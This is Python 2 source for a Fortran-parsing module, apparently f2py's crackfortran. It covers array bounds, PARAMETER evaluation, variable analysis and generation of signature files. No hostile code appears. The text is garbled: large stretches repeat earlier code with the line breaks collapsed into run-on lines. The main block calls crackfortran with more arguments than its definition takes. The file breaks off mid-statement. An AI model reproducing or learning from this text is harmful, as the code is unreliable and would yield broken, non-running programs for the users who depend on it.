        if p1==0: d = str(dl[1])
        elif p1<0: d = '%s-%s'%(dl[1],-p1)
        else: d = '%s+%s'%(dl[1],p1)
    elif type(edl[1]) is type(0):
        p1 = 1+edl[1]
        if p1==0: d='-(%s)' % (dl[0])
        else: d='%s-(%s)' % (p1,dl[0])
    else: d = '%s-(%s)+1'%(dl[1],dl[0])
    try: return `myeval(d,{},{})`,None,None
    except: pass
    # bounds are symbolic: try to express both as linear forms a*x+b
    d1,d2=getlincoef(dl[0],args),getlincoef(dl[1],args)
    if None not in [d1[0],d2[0]]:
        if (d1[0],d2[0])==(0,0):
            return `d2[1]-d1[1]+1`,None,None
        b = d2[1] - d1[1] + 1
        d1 = (d1[0],0,d1[2])
        d2 = (d2[0],b,d2[2])
        if d1[0]==0 and d2[2] in args:
            if b<0: return '%s * %s - %s'%(d2[0],d2[2],-b),d2[2],'+%s)/(%s)'%(-b,d2[0])
            elif b: return '%s * %s + %s'%(d2[0],d2[2],b),d2[2],'-%s)/(%s)'%(b,d2[0])
            else: return '%s * %s'%(d2[0],d2[2]),d2[2],')/(%s)'%(d2[0])
        if d2[0]==0 and d1[2] in args:
            if b<0: return '%s * %s - %s'%(-d1[0],d1[2],-b),d1[2],'+%s)/(%s)'%(-b,-d1[0])
            elif b: return '%s * %s + %s'%(-d1[0],d1[2],b),d1[2],'-%s)/(%s)'%(b,-d1[0])
            else: return '%s * %s'%(-d1[0],d1[2]),d1[2],')/(%s)'%(-d1[0])
        if d1[2]==d2[2] and d1[2] in args:
            a = d2[0] - d1[0]
            if not a: return `b`,None,None
            if b<0: return '%s * %s - %s'%(a,d1[2],-b),d2[2],'+%s)/(%s)'%(-b,a)
            elif b: return '%s * %s + %s'%(a,d1[2],b),d2[2],'-%s)/(%s)'%(b,a)
            else: return '%s * %s'%(a,d1[2]),d2[2],')/(%s)'%(a)
        # the bounds depend on two different symbols: build the textual
        # difference upper-lower+1, warning about undefined variables
        if d1[0]==d2[0]==1:
            c = str(d1[2])
            if c not in args:
                if _varname_match(c):
                    outmess('\tgetarrlen:variable "%s" undefined\n' % (c))
                c = '(%s)'%c
            if b==0: d='%s-%s' % (d2[2],c)
            elif b<0: d='%s-%s-%s' % (d2[2],c,-b)
            else: d='%s-%s+%s' % (d2[2],c,b)
        elif d1[0]==0:
            c2 = str(d2[2])
            if c2 not in args:
                if _varname_match(c2):
                    outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
                c2 = '(%s)'%c2
            if d2[0]==1: pass
            elif d2[0]==-1: c2='-%s' %c2
            else: c2='%s*%s'%(d2[0],c2)
            if b==0: d=c2
            elif b<0: d='%s-%s' % (c2,-b)
            else: d='%s+%s' % (c2,b)
        elif d2[0]==0:
            c1 = str(d1[2])
            if c1 not in args:
                if _varname_match(c1):
                    outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
                c1 = '(%s)'%c1
            if d1[0]==1: c1='-%s'%c1
            elif d1[0]==-1: c1='+%s'%c1
            elif d1[0]<0: c1='+%s*%s'%(-d1[0],c1)
            else: c1 = '-%s*%s' % (d1[0],c1)
            if b==0: d=c1
            elif b<0: d='%s-%s' % (c1,-b)
            else: d='%s+%s' % (c1,b)
        else:
            c1 = str(d1[2])
            if c1 not in args:
                if _varname_match(c1):
                    outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
                c1 = '(%s)'%c1
            if d1[0]==1: c1='-%s'%c1
            elif d1[0]==-1: c1='+%s'%c1
            elif d1[0]<0: c1='+%s*%s'%(-d1[0],c1)
            else: c1 = '-%s*%s' % (d1[0],c1)
            c2 = str(d2[2])
            if c2 not in args:
                if _varname_match(c2):
                    outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
                c2 = '(%s)'%c2
            if d2[0]==1: pass
            elif d2[0]==-1: c2='-%s' %c2
            else: c2='%s*%s'%(d2[0],c2)
            if b==0: d='%s%s' % (c2,c1)
            elif b<0: d='%s%s-%s' % (c2,c1,-b)
            else: d='%s%s+%s' % (c2,c1,b)
    return d,None,None
% (c1)) c1 = '(%s)'%c1 if d1[0]==1: c1='-%s'%c1 elif d1[0]==-1: c1='+%s'%c1 elif d1[0]<0: c1='+%s*%s'%(-d1[0],c1) else: c1 = '-%s*%s' % (d1[0],c1) if b==0: d=c1 elif b<0: d='%s-%s' % (c1,-b) else: d='%s+%s' % (c1,b) else: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)'%c1 if d1[0]==1: c1='-%s'%c1 elif d1[0]==-1: c1='+%s'%c1 elif d1[0]<0: c1='+%s*%s'%(-d1[0],c1) else: c1 = '-%s*%s' % (d1[0],c1) c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)'%c2 if d2[0]==1: pass elif d2[0]==-1: c2='-%s' %c2 else: c2='%s*%s'%(d2[0],c2) if b==0: d='%s%s' % (c2,c1) elif b<0: d='%s%s-%s' % (c2,c1,-b) else: d='%s%s+%s' % (c2,c1,b) return d,None,None word_pattern = re.compile(r'\b[a-z][\w$]*\b',re.I) def _get_depend_dict(name, vars, deps): if name in vars: words = vars[name].get('depend',[]) if '=' in vars[name] and not isstring(vars[name]): for word in word_pattern.findall(vars[name]['=']): if word not in words and word in vars: words.append(word) for word in words[:]: for w in deps.get(word,[]) \ or _get_depend_dict(word, vars, deps): if w not in words: words.append(w) else: outmess('_get_depend_dict: no dependence info for %s\n' % (`name`)) words = [] deps[name] = words return words def _calc_depend_dict(vars): names = vars.keys() depend_dict = {} for n in names: _get_depend_dict(n, vars, depend_dict) return depend_dict def get_sorted_names(vars): """ """ depend_dict = _calc_depend_dict(vars) names = [] for name in depend_dict.keys(): if not depend_dict[name]: names.append(name) del depend_dict[name] while depend_dict: for name, lst in depend_dict.items(): new_lst = [n for n in lst if n in depend_dict] if not new_lst: names.append(name) del depend_dict[name] else: depend_dict[name] = new_lst return [name for name in names if name in vars] def _kind_func(string): #XXX: return something sensible. 
def _selected_int_kind_func(r):
    """Emulate Fortran SELECTED_INT_KIND: smallest kind holding 10**r."""
    #XXX: This should be processor dependent
    m = 10**r
    if m<=2**8: return 1
    if m<=2**16: return 2
    if m<=2**32: return 4
    if m<=2**63: return 8
    if m<=2**128: return 16
    return -1

def _selected_real_kind_func(p, r=0, radix=0):
    """Emulate Fortran SELECTED_REAL_KIND for precision p (r, radix are
    accepted but ignored)."""
    #XXX: This should be processor dependent
    # This is only good for 0 <= p <= 20
    if p < 7: return 4
    if p < 16: return 8
    # 80-bit extended is unavailable on POWER; it goes straight to 128-bit
    if platform.machine().lower().startswith('power'):
        if p <= 20:
            return 16
    else:
        if p < 19:
            return 10
        elif p <= 20:
            return 16
    return -1

def get_parameters(vars, global_params={}):
    """Evaluate the PARAMETER constants found in *vars* (in dependency
    order) and return a name->value dict, seeded with *global_params*.
    Fortran kind syntax (kind(...), selected_*_kind(...), kind suffixes,
    d-exponents, .true./.false.) is translated to Python before eval.
    Values that cannot be evaluated are kept as their source text.
    """
    params = copy.copy(global_params)
    g_params = copy.copy(global_params)
    for name,func in [('kind',_kind_func),
                      ('selected_int_kind',_selected_int_kind_func),
                      ('selected_real_kind',_selected_real_kind_func),
                      ]:
        if name not in g_params:
            g_params[name] = func
    param_names = []
    for n in get_sorted_names(vars):
        if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']:
            param_names.append(n)
    kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)',re.I)
    selected_int_kind_re = re.compile(r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)',re.I)
    selected_kind_re = re.compile(r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)',re.I)
    for n in param_names:
        if '=' in vars[n]:
            v = vars[n]['=']
            if islogical(vars[n]):
                v = v.lower()
                for repl in [
                    ('.false.','False'),
                    ('.true.','True'),
                    #TODO: test .eq., .neq., etc replacements.
                    ]:
                    v = v.replace(*repl)
            v = kind_re.sub(r'kind("\1")',v)
            v = selected_int_kind_re.sub(r'selected_int_kind(\1)',v)
            if isinteger(vars[n]) and not selected_kind_re.match(v):
                # strip a Fortran kind suffix, e.g. 10_4 -> 10
                v = v.split('_')[0]
            if isdouble(vars[n]):
                # rewrite d-exponents (1.0d0) to e-exponents for Python
                tt = list(v)
                for m in real16pattern.finditer(v):
                    tt[m.start():m.end()] = list(\
                            v[m.start():m.end()].lower().replace('d', 'e'))
                v = ''.join(tt)
            if iscomplex(vars[n]):
                # NOTE(review): the split result is unused; complex
                # parameter values appear not to be fully handled here.
                if v[0]=='(' and v[-1]==')':
                    l = markoutercomma(v[1:-1]).split('@,@')
            try:
                params[n] = eval(v,g_params,params)
            except Exception,msg:
                params[n] = v
                #print params
                outmess('get_parameters: got "%s" on %s\n' % (msg,`v`))
            if isstring(vars[n]) and type(params[n]) is type(0):
                params[n] = chr(params[n])
            nl = n.lower()
            if nl!=n:
                params[nl] = params[n]
        else:
            print vars[n]
            outmess('get_parameters:parameter %s does not have value?!\n'%(`n`))
    return params
]: v = v.replace(*repl) v = kind_re.sub(r'kind("\1")',v) v = selected_int_kind_re.sub(r'selected_int_kind(\1)',v) if isinteger(vars[n]) and not selected_kind_re.match(v): v = v.split('_')[0] if isdouble(vars[n]): tt = list(v) for m in real16pattern.finditer(v): tt[m.start():m.end()] = list(\ v[m.start():m.end()].lower().replace('d', 'e')) v = ''.join(tt) if iscomplex(vars[n]): if v[0]=='(' and v[-1]==')': l = markoutercomma(v[1:-1]).split('@,@') try: params[n] = eval(v,g_params,params) except Exception,msg: params[n] = v #print params outmess('get_parameters: got "%s" on %s\n' % (msg,`v`)) if isstring(vars[n]) and type(params[n]) is type(0): params[n] = chr(params[n]) nl = n.lower() if nl!=n: params[nl] = params[n] else: print vars[n] outmess('get_parameters:parameter %s does not have value?!\n'%(`n`)) return params def _eval_length(length,params): if length in ['(:)','(*)','*']: return '(*)' return _eval_scalar(length,params) _is_kind_number = re.compile(r'\d+_').match def _eval_scalar(value,params): if _is_kind_number(value): value = value.split('_')[0] try: value = str(eval(value,{},params)) except (NameError, SyntaxError): return value except Exception,msg: errmess('"%s" in evaluating %r '\ '(available names: %s)\n' \ % (msg,value,params.keys())) return value def analyzevars(block): global f90modulevars setmesstext(block) implicitrules,attrrules=buildimplicitrules(block) vars=copy.copy(block['vars']) if block['block']=='function' and block['name'] not in vars: vars[block['name']]={} if '' in block['vars']: del vars[''] if 'attrspec' in block['vars']['']: gen=block['vars']['']['attrspec'] for n in vars.keys(): for k in ['public','private']: if k in gen: vars[n]=setattrspec(vars[n],k) svars=[] args = block['args'] for a in args: try: vars[a] svars.append(a) except KeyError: pass for n in vars.keys(): if n not in args: svars.append(n) params = get_parameters(vars, get_useparameters(block)) dep_matches = {} name_match = re.compile(r'\w[\w\d_$]*').match for v in 
vars.keys(): m = name_match(v) if m: n = v[m.start():m.end()] try: dep_matches[n] except KeyError: dep_matches[n] = re.compile(r'.*\b%s\b'%(v),re.I).match for n in svars: if n[0] in attrrules.keys(): vars[n]=setattrspec(vars[n],attrrules[n[0]]) if 'typespec' not in vars[n]: if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']): if implicitrules: ln0 = n[0].lower() for k in implicitrules[ln0].keys(): if k=='typespec' and implicitrules[ln0][k]=='undefined': continue if k not in vars[n]: vars[n][k]=implicitrules[ln0][k] elif k=='attrspec': for l in implicitrules[ln0][k]: vars[n]=setattrspec(vars[n],l) elif n in block['args']: outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n'%(`n`,block['name'])) if 'charselector' in vars[n]: if 'len' in vars[n]['charselector']: l = vars[n]['charselector']['len'] try: l = str(eval(l,{},params)) except: pass vars[n]['charselector']['len'] = l if 'kindselector' in vars[n]: if 'kind' in vars[n]['kindselector']: l = vars[n]['kindselector']['kind'] try: l = str(eval(l,{},params)) except: pass vars[n]['kindselector']['kind'] = l savelindims = {} if 'attrspec' in vars[n]: attr=vars[n]['attrspec'] attr.reverse() vars[n]['attrspec']=[] dim,intent,depend,check,note=None,None,None,None,None for a in attr: if a[:9]=='dimension': dim=(a[9:].strip())[1:-1] elif a[:6]=='intent': intent=(a[6:].strip())[1:-1] elif a[:6]=='depend': depend=(a[6:].strip())[1:-1] elif a[:5]=='check': check=(a[5:].strip())[1:-1] elif a[:4]=='note': note=(a[4:].strip())[1:-1] else: vars[n]=setattrspec(vars[n],a) if intent: if 'intent' not in vars[n]: vars[n]['intent']=[] for c in [x.strip() for x in markoutercomma(intent).split('@,@')]: if not c in vars[n]['intent']: vars[n]['intent'].append(c) intent=None if note: note=note.replace('\\n\\n','\n\n') note=note.replace('\\n ','\n') if 'note' not in vars[n]: vars[n]['note']=[note] else: vars[n]['note'].append(note) note=None if depend is not None: if 'depend' not in vars[n]: 
vars[n]['depend']=[] for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]): if c not in vars[n]['depend']: vars[n]['depend'].append(c) depend=None if check is not None: if 'check' not in vars[n]: vars[n]['check']=[] for c in [x.strip() for x in markoutercomma(check).split('@,@')]: if not c in vars[n]['check']: vars[n]['check'].append(c) check=None if dim and 'dimension' not in vars[n]: vars[n]['dimension']=[] for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]): star = '*' if d==':': star=':' if d in params: d = str(params[d]) for p in params.keys(): m = re.match(r'(?P<before>.*?)\b'+p+r'\b(?P<after>.*)',d,re.I) if m: #outmess('analyzevars:replacing parameter %s in %s (dimension of %s) with %s\n'%(`p`,`d`,`n`,`params[p]`)) d = m.group('before')+str(params[p])+m.group('after') if d==star: dl = [star] else: dl=markoutercomma(d,':').split('@:@') if len(dl)==2 and '*' in dl: # e.g. dimension(5:*) dl = ['*'] d = '*' if len(dl)==1 and not dl[0]==star: dl = ['1',dl[0]] if len(dl)==2: d,v,di = getarrlen(dl,block['vars'].keys()) if d[:4] == '1 * ': d = d[4:] if di and di[-4:] == '/(1)': di = di[:-4] if v: savelindims[d] = v,di vars[n]['dimension'].append(d) if 'dimension' in vars[n]: if isintent_c(vars[n]): shape_macro = 'shape' else: shape_macro = 'shape'#'fshape' if isstringarray(vars[n]): if 'charselector' in vars[n]: d = vars[n]['charselector'] if '*' in d: d = d['*'] errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n'\ %(d,n, ','.join(vars[n]['dimension']), n,','.join(vars[n]['dimension']+[d]))) vars[n]['dimension'].append(d) del vars[n]['charselector'] if 'intent' not in vars[n]: vars[n]['intent'] = [] if 'c' not in vars[n]['intent']: vars[n]['intent'].append('c') else: errmess("analyzevars: charselector=%r unhandled." 
% (d)) if 'check' not in vars[n] and 'args' in block and n in block['args']: flag = 'depend' not in vars[n] if flag: vars[n]['depend']=[] vars[n]['check']=[] if 'dimension' in vars[n]: #/----< no check #vars[n]['check'].append('rank(%s)==%s'%(n,len(vars[n]['dimension']))) i=-1; ni=len(vars[n]['dimension']) for d in vars[n]['dimension']: ddeps=[] # dependecies of 'd' ad='' pd='' #origd = d if d not in vars: if d in savelindims: pd,ad='(',savelindims[d][1] d = savelindims[d][0] else: for r in block['args']: #for r in block['vars'].keys(): if r not in vars: continue if re.match(r'.*?\b'+r+r'\b',d,re.I): ddeps.append(r) if d in vars: if 'attrspec' in vars[d]: for aa in vars[d]['attrspec']: if aa[:6]=='depend': ddeps += aa[6:].strip()[1:-1].split(',') if 'depend' in vars[d]: ddeps=ddeps+vars[d]['depend'] i=i+1 if d in vars and ('depend' not in vars[d]) \ and ('=' not in vars[d]) and (d not in vars[n]['depend']) \ and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]): vars[d]['depend']=[n] if ni>1: vars[d]['=']='%s%s(%s,%s)%s'% (pd,shape_macro,n,i,ad) else: vars[d]['=']='%slen(%s)%s'% (pd,n,ad) # /---< no check if 1 and 'check' not in vars[d]: if ni>1: vars[d]['check']=['%s%s(%s,%i)%s==%s'\ %(pd,shape_macro,n,i,ad,d)] else: vars[d]['check']=['%slen(%s)%s>=%s'%(pd,n,ad,d)] if 'attrspec' not in vars[d]: vars[d]['attrspec']=['optional'] if ('optional' not in vars[d]['attrspec']) and\ ('required' not in vars[d]['attrspec']): vars[d]['attrspec'].append('optional') elif d not in ['*',':']: #/----< no check #if ni>1: vars[n]['check'].append('shape(%s,%i)==%s'%(n,i,d)) #else: vars[n]['check'].append('len(%s)>=%s'%(n,d)) if flag: if d in vars: if n not in ddeps: vars[n]['depend'].append(d) else: vars[n]['depend'] = vars[n]['depend'] + ddeps elif isstring(vars[n]): length='1' if 'charselector' in vars[n]: if '*' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['*'], params) vars[n]['charselector']['*']=length elif 'len' in 
vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['len'], params) del vars[n]['charselector']['len'] vars[n]['charselector']['*']=length if not vars[n]['check']: del vars[n]['check'] if flag and not vars[n]['depend']: del vars[n]['depend'] if '=' in vars[n]: if 'attrspec' not in vars[n]: vars[n]['attrspec']=[] if ('optional' not in vars[n]['attrspec']) and \ ('required' not in vars[n]['attrspec']): vars[n]['attrspec'].append('optional') if 'depend' not in vars[n]: vars[n]['depend']=[] for v,m in dep_matches.items(): if m(vars[n]['=']): vars[n]['depend'].append(v) if not vars[n]['depend']: del vars[n]['depend'] if isscalar(vars[n]): vars[n]['='] = _eval_scalar(vars[n]['='],params) for n in vars.keys(): if n==block['name']: # n is block name if 'note' in vars[n]: block['note']=vars[n]['note'] if block['block']=='function': if 'result' in block and block['result'] in vars: vars[n]=appenddecl(vars[n],vars[block['result']]) if 'prefix' in block: pr=block['prefix']; ispure=0; isrec=1 pr1=pr.replace('pure','') ispure=(not pr==pr1) pr=pr1.replace('recursive','') isrec=(not pr==pr1) m=typespattern[0].match(pr) if m: typespec,selector,attr,edecl=cracktypespec0(m.group('this'),m.group('after')) kindselect,charselect,typename=cracktypespec(typespec,selector) vars[n]['typespec']=typespec if kindselect: if 'kind' in kindselect: try: kindselect['kind'] = eval(kindselect['kind'],{},params) except: pass vars[n]['kindselector']=kindselect if charselect: vars[n]['charselector']=charselect if typename: vars[n]['typename']=typename if ispure: vars[n]=setattrspec(vars[n],'pure') if isrec: vars[n]=setattrspec(vars[n],'recursive') else: outmess('analyzevars: prefix (%s) were not used\n'%`block['prefix']`) if not block['block'] in ['module','pythonmodule','python module','block data']: if 'commonvars' in block: neededvars=copy.copy(block['args']+block['commonvars']) else: neededvars=copy.copy(block['args']) for n in vars.keys(): if 
l_or(isintent_callback,isintent_aux)(vars[n]): neededvars.append(n) if 'entry' in block: neededvars.extend(block['entry'].keys()) for k in block['entry'].keys(): for n in block['entry'][k]: if n not in neededvars: neededvars.append(n) if block['block']=='function': if 'result' in block: neededvars.append(block['result']) else: neededvars.append(block['name']) if block['block'] in ['subroutine','function']: name = block['name'] if name in vars and 'intent' in vars[name]: block['intent'] = vars[name]['intent'] if block['block'] == 'type': neededvars.extend(vars.keys()) for n in vars.keys(): if n not in neededvars: del vars[n] return vars analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z',re.I) def expr2name(a, block, args=[]): orig_a = a a_is_expr = not analyzeargs_re_1.match(a) if a_is_expr: # `a` is an expression implicitrules,attrrules=buildimplicitrules(block) at=determineexprtype(a,block['vars'],implicitrules) na='e_' for c in a: c = c.lower() if c not in string.lowercase+string.digits: c='_' na=na+c if na[-1]=='_': na=na+'e' else: na=na+'_e' a=na while a in block['vars'] or a in block['args']: a=a+'r' if a in args: k = 1 while a + str(k) in args: k = k + 1 a = a + str(k) if a_is_expr: block['vars'][a]=at else: if a not in block['vars']: if orig_a in block['vars']: block['vars'][a] = block['vars'][orig_a] else: block['vars'][a]={} if 'externals' in block and orig_a in block['externals']+block['interfaced']: block['vars'][a]=setattrspec(block['vars'][a],'external') return a def analyzeargs(block): setmesstext(block) implicitrules,attrrules=buildimplicitrules(block) if 'args' not in block: block['args']=[] args=[] for a in block['args']: a = expr2name(a, block, args) args.append(a) block['args']=args if 'entry' in block: for k,args1 in block['entry'].items(): for a in args1: if a not in block['vars']: block['vars'][a]={} for b in block['body']: if b['name'] in args: if 'externals' not in block: block['externals']=[] if b['name'] not in block['externals']: 
block['externals'].append(b['name']) if 'result' in block and block['result'] not in block['vars']: block['vars'][block['result']]={} return block determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z',re.I) determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(P<name>[\w]+)|)\Z',re.I) determineexprtype_re_3 = re.compile(r'\A[+-]?[\d.]+[\d+-de.]*(_(P<name>[\w]+)|)\Z',re.I) determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z',re.I) determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z',re.I) def _ensure_exprdict(r): if type(r) is type(0): return {'typespec':'integer'} if type(r) is type(0.0): return {'typespec':'real'} if type(r) is type(0j): return {'typespec':'complex'} assert type(r) is type({}),`r` return r def determineexprtype(expr,vars,rules={}): if expr in vars: return _ensure_exprdict(vars[expr]) expr=expr.strip() if determineexprtype_re_1.match(expr): return {'typespec':'complex'} m=determineexprtype_re_2.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess('determineexprtype: selected kind types not supported (%s)\n'%`expr`) return {'typespec':'integer'} m = determineexprtype_re_3.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess('determineexprtype: selected kind types not supported (%s)\n'%`expr`) return {'typespec':'real'} for op in ['+','-','*','/']: for e in [x.strip() for x in markoutercomma(expr,comma=op).split('@'+op+'@')]: if e in vars: return _ensure_exprdict(vars[e]) t={} if determineexprtype_re_4.match(expr): # in parenthesis t=determineexprtype(expr[1:-1],vars,rules) else: m = determineexprtype_re_5.match(expr) if m: rn=m.group('name') t=determineexprtype(m.group('name'),vars,rules) if t and 'attrspec' in t: del t['attrspec'] if not t: if rn[0] in rules: return _ensure_exprdict(rules[rn[0]]) if expr[0] in '\'"': return {'typespec':'character','charselector':{'*':'*'}} if not t: outmess('determineexprtype: could not determine expressions (%s) type.\n'%(`expr`)) return t ###### def 
crack2fortrangen(block,tab='\n', as_interface=False): global skipfuncs, onlyfuncs setmesstext(block) ret='' if isinstance(block, list): for g in block: if g and g['block'] in ['function','subroutine']: if g['name'] in skipfuncs: continue if onlyfuncs and g['name'] not in onlyfuncs: continue ret=ret+crack2fortrangen(g,tab,as_interface=as_interface) return ret prefix='' name='' args='' blocktype=block['block'] if blocktype=='program': return '' argsl = [] if 'name' in block: name=block['name'] if 'args' in block: vars = block['vars'] for a in block['args']: a = expr2name(a, block, argsl) if not isintent_callback(vars[a]): argsl.append(a) if block['block']=='function' or argsl: args='(%s)'%','.join(argsl) f2pyenhancements = '' if 'f2pyenhancements' in block: for k in block['f2pyenhancements'].keys(): f2pyenhancements = '%s%s%s %s'%(f2pyenhancements,tab+tabchar,k,block['f2pyenhancements'][k]) intent_lst = block.get('intent',[])[:] if blocktype=='function' and 'callback' in intent_lst: intent_lst.remove('callback') if intent_lst: f2pyenhancements = '%s%sintent(%s) %s'%\ (f2pyenhancements,tab+tabchar, ','.join(intent_lst),name) use='' if 'use' in block: use=use2fortran(block['use'],tab+tabchar) common='' if 'common' in block: common=common2fortran(block['common'],tab+tabchar) if name=='unknown_interface': name='' result='' if 'result' in block: result=' result (%s)'%block['result'] if block['result'] not in argsl: argsl.append(block['result']) #if 'prefix' in block: # prefix=block['prefix']+' ' body=crack2fortrangen(block['body'],tab+tabchar) vars=vars2fortran(block,block['vars'],argsl,tab+tabchar, as_interface=as_interface) mess='' if 'from' in block and not as_interface: mess='! 
in %s'%block['from'] if 'entry' in block: entry_stmts = '' for k,i in block['entry'].items(): entry_stmts = '%s%sentry %s(%s)' \ % (entry_stmts,tab+tabchar,k,','.join(i)) body = body + entry_stmts if blocktype=='block data' and name=='_BLOCK_DATA_': name = '' ret='%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s'%(tab,prefix,blocktype,name,args,result,mess,f2pyenhancements,use,vars,common,body,tab,blocktype,name) return ret def common2fortran(common,tab=''): ret='' for k in common.keys(): if k=='_BLNK_': ret='%s%scommon %s'%(ret,tab,','.join(common[k])) else: ret='%s%scommon /%s/ %s'%(ret,tab,k,','.join(common[k])) return ret def use2fortran(use,tab=''): ret='' for m in use.keys(): ret='%s%suse %s,'%(ret,tab,m) if use[m]=={}: if ret and ret[-1]==',': ret=ret[:-1] continue if 'only' in use[m] and use[m]['only']: ret='%s only:'%(ret) if 'map' in use[m] and use[m]['map']: c=' ' for k in use[m]['map'].keys(): if k==use[m]['map'][k]: ret='%s%s%s'%(ret,c,k); c=',' else: ret='%s%s%s=>%s'%(ret,c,k,use[m]['map'][k]); c=',' if ret and ret[-1]==',': ret=ret[:-1] return ret def true_intent_list(var): lst = var['intent'] ret = [] for intent in lst: try: exec('c = isintent_%s(var)' % intent) except NameError: c = 0 if c: ret.append(intent) return ret def vars2fortran(block,vars,args,tab='', as_interface=False): """ TODO: public sub ... 
""" setmesstext(block) ret='' nout=[] for a in args: if a in block['vars']: nout.append(a) if 'commonvars' in block: for a in block['commonvars']: if a in vars: if a not in nout: nout.append(a) else: errmess('vars2fortran: Confused?!: "%s" is not defined in vars.\n'%a) if 'varnames' in block: nout.extend(block['varnames']) if not as_interface: for a in vars.keys(): if a not in nout: nout.append(a) for a in nout: if 'depend' in vars[a]: for d in vars[a]['depend']: if d in vars and 'depend' in vars[d] and a in vars[d]['depend']: errmess('vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n'%(a,d)) if 'externals' in block and a in block['externals']: if isintent_callback(vars[a]): ret='%s%sintent(callback) %s'%(ret,tab,a) ret='%s%sexternal %s'%(ret,tab,a) if isoptional(vars[a]): ret='%s%soptional %s'%(ret,tab,a) if a in vars and 'typespec' not in vars[a]: continue cont=1 for b in block['body']: if a==b['name'] and b['block']=='function': cont=0;break if cont: continue if a not in vars: show(vars) outmess('vars2fortran: No definition for argument "%s".\n'%a) continue if a==block['name'] and not block['block']=='function': continue if 'typespec' not in vars[a]: if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']: if a in args: ret='%s%sexternal %s'%(ret,tab,a) continue show(vars[a]) outmess('vars2fortran: No typespec for argument "%s".\n'%a) continue vardef=vars[a]['typespec'] if vardef=='type' and 'typename' in vars[a]: vardef='%s(%s)'%(vardef,vars[a]['typename']) selector={} if 'kindselector' in vars[a]: selector=vars[a]['kindselector'] elif 'charselector' in vars[a]: selector=vars[a]['charselector'] if '*' in selector: if selector['*'] in ['*',':']: vardef='%s*(%s)'%(vardef,selector['*']) else: vardef='%s*%s'%(vardef,selector['*']) else: if 'len' in selector: vardef='%s(len=%s'%(vardef,selector['len']) if 'kind' in selector: vardef='%s,kind=%s)'%(vardef,selector['kind']) else: vardef='%s)'%(vardef) elif 'kind' in selector: 
vardef='%s(kind=%s)'%(vardef,selector['kind']) c=' ' if 'attrspec' in vars[a]: attr=[] for l in vars[a]['attrspec']: if l not in ['external']: attr.append(l) if attr: vardef='%s, %s'%(vardef,','.join(attr)) c=',' if 'dimension' in vars[a]: # if not isintent_c(vars[a]): # vars[a]['dimension'].reverse() vardef='%s%sdimension(%s)'%(vardef,c,','.join(vars[a]['dimension'])) c=',' if 'intent' in vars[a]: lst = true_intent_list(vars[a]) if lst: vardef='%s%sintent(%s)'%(vardef,c,','.join(lst)) c=',' if 'check' in vars[a]: vardef='%s%scheck(%s)'%(vardef,c,','.join(vars[a]['check'])) c=',' if 'depend' in vars[a]: vardef='%s%sdepend(%s)'%(vardef,c,','.join(vars[a]['depend'])) c=',' if '=' in vars[a]: v = vars[a]['='] if vars[a]['typespec'] in ['complex','double complex']: try: v = eval(v) v = '(%s,%s)' % (v.real,v.imag) except: pass vardef='%s :: %s=%s'%(vardef,a,v) else: vardef='%s :: %s'%(vardef,a) ret='%s%s%s'%(ret,tab,vardef) return ret ###### def crackfortran(files): global usermodules outmess('Reading fortran codes...\n',0) readfortrancode(files,crackline) outmess('Post-processing...\n',0) usermodules=[] postlist=postcrack(grouplist[0]) outmess('Post-processing (stage 2)...\n',0) postlist=postcrack2(postlist) return usermodules+postlist def crack2fortran(block): global f2py_version pyf=crack2fortrangen(block)+'\n' header="""! -*- f90 -*- ! Note: the context of this file is case sensitive. """ footer=""" ! This file was auto-generated with f2py (version:%s). ! 
See http://cens.ioc.ee/projects/f2py2e/ """%(f2py_version) return header+pyf+footer if __name__ == "__main__": files=[] funcs=[] f=1;f2=0;f3=0 showblocklist=0 for l in sys.argv[1:]: if l=='': pass elif l[0]==':': f=0 elif l=='-quiet': quiet=1 verbose=0 elif l=='-verbose': verbose=2 quiet=0 elif l=='-fix': if strictf77: outmess('Use option -f90 before -fix if Fortran 90 code is in fix form.\n',0) skipemptyends=1 sourcecodeform='fix' elif l=='-skipemptyends': skipemptyends=1 elif l=='--ignore-contains': ignorecontains=1 elif l=='-f77': strictf77=1 sourcecodeform='fix' elif l=='-f90': strictf77=0 sourcecodeform='free' skipemptyends=1 elif l=='-h': f2=1 elif l=='-show': showblocklist=1 elif l=='-m': f3=1 elif l[0]=='-': errmess('Unknown option %s\n'%`l`) elif f2: f2=0 pyffilename=l elif f3: f3=0 f77modulename=l elif f: try: open(l).close() files.append(l) except IOError,detail: errmess('IOError: %s\n'%str(detail)) else: funcs.append(l) if not strictf77 and f77modulename and not skipemptyends: outmess("""\ Warning: You have specifyied module name for non Fortran 77 code that should not need one (expect if you are scanning F90 code for non module blocks but then you should use flag -skipemptyends and also be sure that the files do not contain programs without program statement). """,0) postlist=crackfortran(files,funcs) if pyffilename: outmess('Writing fortran code to file 